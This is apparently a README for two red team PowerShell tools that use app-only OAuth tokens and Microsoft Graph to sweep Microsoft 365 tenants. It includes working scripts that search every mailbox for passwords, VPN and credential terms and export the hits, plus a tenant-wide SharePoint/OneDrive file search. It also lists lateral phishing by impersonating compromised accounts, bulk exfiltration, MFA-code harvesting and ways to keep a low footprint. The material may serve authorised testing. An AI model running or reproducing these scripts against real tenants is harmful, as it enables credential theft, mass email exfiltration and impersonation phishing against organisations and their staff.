Red Team tooling for Microsoft 365 exploitation via Microsoft Graph API.
Two WinForms GUI tools for enumerating, searching, and exfiltrating data from M365 environments using application-level OAuth tokens — no user interaction required.
| Tool | Target | What it does |
|---|---|---|
| MailPwned-GUI.ps1 | Exchange Online / Outlook | Browse mailboxes, search mail, download attachments, send impersonation emails |
| SharePwned-GUI.ps1 | SharePoint / OneDrive | Browse sites and drives, search files, preview and download documents |
These tools are intended exclusively for authorised red team engagements, penetration testing, and security research.
Using them against systems you do not own or have explicit written permission to test is illegal and may violate computer fraud laws (CFAA, Computer Misuse Act, etc.).
The authors accept no liability for any misuse or damage caused.
- PowerShell 5.1 (Windows PowerShell — no PS7 required)
- A registered Azure AD (Microsoft Entra ID) application with admin-consented Application permissions (see the per-tool permission tables below)
Three authentication methods are supported by both tools:
- Client secret: `-TenantId <guid> -ClientId <guid> -ClientSecret <secret>`
- Certificate: `-TenantId <guid> -ClientId <guid> -CertificateThumbprint <thumb>`
- Raw token: `-AccessToken <jwt>`

MailPwned-GUI.ps1 is a WinForms GUI for enumerating, searching, reading, and exfiltrating email from M365/Exchange Online environments.
| Permission | Required for |
|---|---|
| Mail.Read | Read mail in all mailboxes |
| Mail.ReadWrite | Send/reply/forward/delete (optional) |
| User.Read.All | Enumerate all mailboxes (global search) |
Note: `/v1.0/search/query` with the `message` entityType does not support application permissions. Enumerating users and then searching each mailbox individually (`GET /users/{id}/messages?$search="..."`) is the only viable approach with app tokens, and it is exactly what MailPwned implements.
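The following script is an added example, not MailPwned's own code. It shows the client-secret authentication path from the list above end to end: a client-credentials token request, a check of the token's `roles` claim so a missing admin consent fails early instead of as a wall of 403s, and the user-enumeration plus per-mailbox `$search` loop that the note describes, with `@odata.nextLink` paging and `Retry-After` back-off on throttling. The tenant ID, client ID, secret and search query are placeholders; everything else is the public Graph and Entra ID token endpoints. Written for Windows PowerShell 5.1, matching the requirements above.

```powershell
# Added example (not part of MailPwned-GUI.ps1): client-credentials token,
# roles-claim check, and per-mailbox $search. Tenant/app values are placeholders.
param(
    [string]$TenantId     = '00000000-0000-0000-0000-000000000000',
    [string]$ClientId     = '11111111-1111-1111-1111-111111111111',
    [string]$ClientSecret = 'REPLACE_ME',
    [string]$Query        = 'password OR VPN OR credentials'
)

$ErrorActionPreference = 'Stop'
$Graph = 'https://graph.microsoft.com/v1.0'

# 1. Client-credentials grant; the .default scope returns every admin-consented app permission.
$tokenResponse = Invoke-RestMethod -Method Post `
    -Uri "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token" `
    -ContentType 'application/x-www-form-urlencoded' `
    -Body @{
        client_id     = $ClientId
        client_secret = $ClientSecret
        scope         = 'https://graph.microsoft.com/.default'
        grant_type    = 'client_credentials'
    }
$token   = $tokenResponse.access_token
$headers = @{ Authorization = "Bearer $token" }

# 2. Decode the JWT payload (base64url) and confirm the roles claim carries what we need.
function Get-JwtPayload([string]$Jwt) {
    $payload = $Jwt.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
}
$roles = @((Get-JwtPayload $token).roles)
Write-Host "App roles in token: $($roles -join ', ')"
if ($roles -notcontains 'Mail.Read' -and $roles -notcontains 'Mail.ReadWrite') {
    throw 'Token carries no Mail.Read/Mail.ReadWrite role; admin consent is missing.'
}
if ($roles -notcontains 'User.Read.All') {
    Write-Warning 'No User.Read.All: GET /users will fail, supply UPNs from a file instead.'
}

# 3. Follow @odata.nextLink and honour Retry-After on 429 so throttling does not abort the run.
#    (Windows PowerShell 5.1: $_.Exception.Response is an HttpWebResponse.)
function Invoke-GraphGet([string]$Uri) {
    $items = @()
    while ($Uri) {
        try {
            $page = Invoke-RestMethod -Method Get -Uri $Uri -Headers $headers
        } catch {
            $resp = $_.Exception.Response
            if ($resp -and [int]$resp.StatusCode -eq 429) {
                $wait = [int]($resp.Headers['Retry-After'] | Select-Object -First 1)
                if (-not $wait) { $wait = 10 }
                Start-Sleep -Seconds $wait
                continue
            }
            throw
        }
        $items += $page.value
        $Uri = $page.'@odata.nextLink'
    }
    return $items
}

# 4. Enumerate users, then $search each mailbox. /search/query rejects app tokens for
#    messages, so this per-mailbox loop is the only application-permission route.
$users        = Invoke-GraphGet "$Graph/users?`$select=id,userPrincipalName&`$top=999"
$encodedQuery = [Uri]::EscapeDataString("`"$Query`"")   # $search value must be quoted
$hits = foreach ($u in $users) {
    $uri = "$Graph/users/$($u.id)/messages?`$search=$encodedQuery&`$select=subject,from,receivedDateTime,hasAttachments&`$top=25"
    try {
        Invoke-GraphGet $uri | ForEach-Object {
            [pscustomobject]@{
                Mailbox       = $u.userPrincipalName
                Received      = $_.receivedDateTime
                From          = $_.from.emailAddress.address
                Subject       = $_.subject
                HasAttachment = $_.hasAttachments
            }
        }
    } catch {
        # Accounts without a licensed mailbox return 404 (MailboxNotEnabledForRESTAPI); skip them.
        Write-Warning "Skipping $($u.userPrincipalName): $($_.Exception.Message)"
    }
}
$hits | Sort-Object Received -Descending | Format-Table -AutoSize
$hits | Export-Csv -NoTypeInformation -Path .\mail-hits.csv
```

Two points worth keeping in mind when adapting this: every request in the loop is logged by Graph under the application's identity, so a tenant-wide sweep is one mailbox-read event per user, and the `roles` check is also how you confirm that a token obtained via the raw `-AccessToken` path actually holds application permissions rather than delegated `scp` scopes.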
`powershell.exe -STA -File .\MailPwned-GUI.ps1`

`-STA` (Single-Threaded Apartment) is required for WinForms.
- Connect using tenant ID + client ID + secret, certificate thumbprint, or raw token
- Region selector for sovereign/GCC clouds (EUR, FRA, NAM, GBR, APC, AUS, CAN, IND, JPN)
- Load mailbox — browse folder tree, read emails with full HTML rendering
- Global search — search across all tenant mailboxes without loading a specific one
- Scoped search — search within a loaded mailbox
- HTML email preview — full rendering with inline image support (no external requests)
- Attachment download — single or bulk
- Compose / Reply / Reply-All / Forward — send impersonation emails
- Mark read/unread, Delete
- Export to CSV
- API log panel — real-time color-coded request/response log for debugging
- Credential hunting — search all mailboxes for `password`, `credentials`, `VPN`, `secret`, etc.
- Lateral phishing — read ongoing email threads and send convincing replies impersonating the compromised account
- Intelligence gathering — enumerate who is emailing whom, find sensitive projects, HR data, investor communications
- Exfiltration — bulk download attachments matching a search query
- Persistence discovery — search for MFA codes, password reset emails, token confirmations
A CLI version developed by Ethical-Kaizoku can be found here.
SharePwned-GUI.ps1 is a WinForms GUI for enumerating, browsing, searching, previewing, and downloading files from SharePoint sites and OneDrive drives across the tenant.
| Permission | Required for |
|---|---|
| Sites.Read.All | Enumerate all SharePoint sites and browse drives |
| Files.Read.All | Read and download files from any drive |
| User.Read.All | Enumerate OneDrive drives for all users (optional) |
Fallback: when `Sites.Read.All` is unavailable, SharePwned falls back to per-user drive enumeration via `Files.Read.All` (listing the users themselves still requires `User.Read.All`).
`powershell.exe -STA -File .\SharePwned-GUI.ps1`

- Connect using tenant ID + client ID + secret, certificate thumbprint, or raw token
- Region selector for sovereign/GCC clouds
- Enumerate all SharePoint sites across the tenant
- Browse drive trees — navigate site document libraries and OneDrive folders
- Full-text search — keyword search across all drives (`/v1.0/search/query` with the `driveItem` entity)
- Fallback search — per-drive search when `Sites.Read.All` is absent
- File preview — text extraction for documents, inline preview panel
- Download files — single file download with progress
- File type icons — extension-aware icon display in the file browser
- API log panel — real-time color-coded request/response log for debugging
- Credential hunting — search all SharePoint/OneDrive for `password`, `secret`, `private key`, config files, `.env`, etc.
- Intelligence gathering — enumerate project sites, HR drives, finance document libraries
- Exfiltration — download files of interest with a small footprint (note that each download is still recorded in the unified audit log as a FileDownloaded event under the app's identity)
- Access mapping — enumerate all sites the compromised app can reach to understand the blast radius
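The following is an added example, not SharePwned's own code, illustrating the two search routes listed above and the fallback note: a tenant-wide `driveItem` query through `/v1.0/search/query`, and, when that call is refused because the app lacks `Sites.Read.All`, a walk over every user's OneDrive with the per-drive `search(q=...)` call that only needs `Files.Read.All` (plus `User.Read.All` to list users). It assumes an application token already obtained by one of the methods above and passed in via `-AccessToken`, and it assumes the tenant's region code is known; with application permissions the Search API requires that code in the request body, which is why it is a parameter here. The default query and region are placeholders.

```powershell
# Added example (not part of SharePwned-GUI.ps1): tenant-wide driveItem search with
# fallback to per-user OneDrive search when the token lacks Sites.Read.All.
# Assumes an app token obtained elsewhere (the -AccessToken path). Windows PowerShell 5.1.
param(
    [Parameter(Mandatory)][string]$AccessToken,
    [string]$Query  = 'password',   # placeholder; OData single quotes must be doubled for search(q=)
    [string]$Region = 'EUR'         # required in the /search/query body when using an app token
)

$ErrorActionPreference = 'Stop'
$Graph   = 'https://graph.microsoft.com/v1.0'
$headers = @{ Authorization = "Bearer $AccessToken" }

function Get-StatusCode($ErrorRecord) {
    # Windows PowerShell 5.1: Response is an HttpWebResponse, StatusCode an enum.
    $r = $ErrorRecord.Exception.Response
    if ($r) { return [int]$r.StatusCode } else { return 0 }
}

function Invoke-GraphGet([string]$Uri) {
    $items = @()
    while ($Uri) {
        $page = Invoke-RestMethod -Method Get -Uri $Uri -Headers $headers
        $items += $page.value
        $Uri = $page.'@odata.nextLink'
    }
    return $items
}

# Route 1: Microsoft Search API, driveItem entity. One request covers every site and
# OneDrive the app can read. Fails with 403 when Sites.Read.All was not consented.
function Search-AllDrives {
    $body = @{
        requests = @(@{
            entityTypes = @('driveItem')
            query       = @{ queryString = $Query }
            region      = $Region
            from        = 0
            size        = 100
        })
    } | ConvertTo-Json -Depth 5
    $res = Invoke-RestMethod -Method Post -Uri "$Graph/search/query" -Headers $headers `
        -ContentType 'application/json' -Body $body
    foreach ($container in $res.value.hitsContainers) {
        foreach ($h in $container.hits) {
            [pscustomobject]@{
                Name   = $h.resource.name
                Path   = $h.resource.webUrl
                Drive  = $h.resource.parentReference.driveId
                Source = 'search/query'
            }
        }
    }
}

# Route 2: no Sites.Read.All. List users, run the per-drive search against each OneDrive,
# and skip accounts whose drive was never provisioned (404) or is out of scope (403).
function Search-PerUserDrives {
    $users = Invoke-GraphGet "$Graph/users?`$select=id,userPrincipalName&`$top=999"
    $q = [Uri]::EscapeDataString($Query)
    foreach ($u in $users) {
        try {
            $hits = Invoke-GraphGet "$Graph/users/$($u.id)/drive/root/search(q='$q')?`$select=name,webUrl,parentReference"
        } catch {
            if ((Get-StatusCode $_) -in 403, 404) { continue }
            throw
        }
        foreach ($h in $hits) {
            [pscustomobject]@{ Name = $h.name; Path = $h.webUrl; Drive = $h.parentReference.driveId; Source = $u.userPrincipalName }
        }
    }
}

try {
    $results = Search-AllDrives
} catch {
    if ((Get-StatusCode $_) -eq 403) {
        Write-Warning 'search/query returned 403 (no Sites.Read.All); falling back to per-user drive search.'
        $results = Search-PerUserDrives
    } else {
        throw
    }
}
$results | Format-Table -AutoSize
```

The fallback route is noisier than the primary one: it issues one request per user instead of one request per tenant, and the 404s from unprovisioned OneDrives are failed requests that appear in Graph logging under the app's identity.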
The tools send the selected region as the `Prefer: exchange.region=<region>` header to route requests to the correct datacenter. Set it when targeting tenants in non-default regions. The same code is also mandatory in the `region` field of a `/v1.0/search/query` request body whenever an application token is used; the call fails without it.
| Code | Region |
|---|---|
| EUR | Europe |
| FRA | France (sovereign) |
| NAM | North America |
| GBR | United Kingdom |
| APC | Asia Pacific |
| AUS | Australia |
| CAN | Canada |
| IND | India |
| JPN | Japan |
- All requests go directly to `https://graph.microsoft.com`; no proxy or relay
- The app token contains the `roles` claim; Graph logs will show application-level access under the registered app's identity
- Loading mailboxes from a file (MailPwned) avoids calling `GET /users`, a lower footprint when a UPN list is already available from OSINT or prior access
- Downloaded HTML emails embed inline images as `data:` URIs, so no outbound requests are made when they are opened
- Both tools suppress script errors and make no outbound connections other than to Graph after token acquisition
For educational and authorised security testing use only.